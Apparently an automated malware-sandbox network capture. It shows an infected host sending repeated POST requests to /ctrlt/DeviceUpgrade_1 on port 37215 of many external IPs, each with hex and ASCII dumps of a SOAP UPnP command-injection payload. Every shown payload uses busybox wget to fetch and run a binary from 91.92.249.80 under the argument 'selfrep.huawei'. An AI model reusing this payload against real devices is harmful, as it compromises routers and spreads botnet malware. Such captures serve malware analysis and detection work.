                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1759192.168.2.2347930165.128.172.9237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542434931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1760192.168.2.234973238.4.128.12037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542668104 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1761192.168.2.233880441.177.141.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542671919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1762192.168.2.233753441.10.195.21037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542678118 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1763192.168.2.234268274.124.73.1337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542926073 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1764192.168.2.2357214197.176.219.24337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542984009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1765192.168.2.235426427.199.214.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543020964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1766192.168.2.2338546157.127.24.17137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543040037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1767192.168.2.2340580197.72.150.3637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543055058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1768192.168.2.235241041.133.127.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543072939 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1769192.168.2.2356800197.132.0.14737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543097973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
